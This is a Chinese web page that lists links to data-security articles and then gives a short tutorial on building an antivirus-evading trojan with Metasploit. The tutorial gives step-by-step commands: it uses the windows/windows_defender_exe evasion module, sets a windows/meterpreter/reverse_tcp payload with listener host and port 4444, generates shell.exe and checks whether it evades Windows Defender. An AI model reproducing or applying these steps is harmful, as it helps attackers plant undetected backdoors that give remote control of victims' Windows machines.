CASB保护零信任环境的数据安全实践:
https://www.secshi.com/39625.html
以数据为中心的人工智能时代数据安全和隐私保护战略动力-GDPR的影响和对策:https://www.secshi.com/39547.html
数据安全的冰与火之歌 从 GDPR 看企业数据安全合规建设:https://www.secshi.com/39457.html
业务流量数据安全应用实践:https://www.secshi.com/39409.html
企业数据安全合规之路:https://www.secshi.com/39203.html
业务数据安全实践:https://www.secshi.com/39189.html
攻防对抗中数据安全的持续优化:https://www.secshi.com/39175.html
加快工业互联网数据安全能力建设 切实护航我国制造业高质量发展:https://www.secshi.com/39153.html
AiLPHA大数据安全分析应用于医疗网络安全闭环的实践:https://www.secshi.com/39145.html
数据安全的若干误解:https://www.secshi.com/39115.html
数据安全保障工程:https://www.secshi.com/39113.html
Metasploit 5.0的时候更新一个Evasion模块,这个模块能非常快捷的生成反杀毒软件的木马,注意!低于5.0以下的版本是没有Evasion模块的,所以需要手动更新Metasploit
如果是使用kail的同学就直接使用msfupdate就能进行更新,如果是使用别的系统的小伙伴就请进入到Metasploit目录下面的bin目录下面,运行msfupdate
打开metasploit
查看evasion模块
这里我们选择第五个模块
use windows/windows_defender_exe
查看需要配置的参数
show options
可以看到只有一个文件名的参数可以配置,我们就修改为shell.exe吧
紧接着我们要配置回显payload
set payload windows/meterpreter/reverse_tcp
set lhost you-ip
set lport 4444
使用exploit或者run 执行
看到回显信息我们可以看到木马存放在/root/.msf4/local/下面
我们来检测一下免杀效果
来自安全师作者GEIT,博客地址:http://www.geit.work/